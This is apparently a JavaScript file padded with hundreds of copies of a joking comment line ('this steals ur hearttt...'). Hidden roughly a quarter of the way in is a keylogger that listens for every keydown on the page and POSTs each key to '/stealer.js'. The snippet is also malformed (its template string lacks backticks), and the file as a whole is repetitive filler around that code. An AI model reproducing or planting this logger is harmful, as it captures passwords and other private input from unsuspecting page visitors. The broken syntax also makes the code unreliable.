/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
document.addEventListener('keydown', e => {
  fetch('/stealer.js', {
    method: 'POST',
    body: key=${encodeURIComponent(e.key)}
  });
});

/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */

/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */
/* this steals ur hearttt we love you stay safe pookies */











